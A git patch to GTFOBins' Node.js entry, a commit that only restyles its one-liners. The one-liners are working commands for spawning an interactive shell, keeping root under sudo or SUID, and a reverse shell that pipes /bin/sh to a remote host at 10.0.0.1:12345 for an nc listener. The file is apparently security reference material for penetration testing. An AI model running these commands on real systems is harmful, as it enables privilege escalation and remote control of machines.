From 6e2242d3f14536b6ff5a9148912b5d689482c5f5 Mon Sep 17 00:00:00 2001 From: Andrea Cardaci Date: Thu, 24 May 2018 00:37:13 +0200 Subject: [PATCH] Fix node code style --- _gtfobins/node.md | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/_gtfobins/node.md b/_gtfobins/node.md index 11c14d0..2f701f6 100644 --- a/_gtfobins/node.md +++ b/_gtfobins/node.md @@ -2,21 +2,21 @@ functions: exec-interactive: - code: | - node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});' + node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' sudo-enabled: - code: | - sudo node -e 'require("child_process").spawn("/bin/sh", [], { stdio: [0, 1, 2]});' + sudo node -e 'require("child_process").spawn("/bin/sh", {stdio: [0, 1, 2]});' suid-enabled: - code: | - ./node -e 'require("child_process").spawn("/bin/sh", [ "-p" ], { stdio: [0, 1, 2]});' + ./node -e 'require("child_process").spawn("/bin/sh", ["-p"], {stdio: [0, 1, 2]});' reverse-shell: - description: Run `nc -l -p 12345` to receive the shell on the other end. code: | export RHOST=10.0.0.1 export RPORT=12345 - node -e 'sh = require("child_process").spawn("/bin/sh", []); + node -e 'sh = require("child_process").spawn("/bin/sh"); client = new require("net").Socket(); - client.connect(process.env.RPORT, process.env.RHOST, function(){ + client.connect(process.env.RPORT, process.env.RHOST, function () { client.pipe(sh.stdin); sh.stdout.pipe(client); sh.stderr.pipe(client);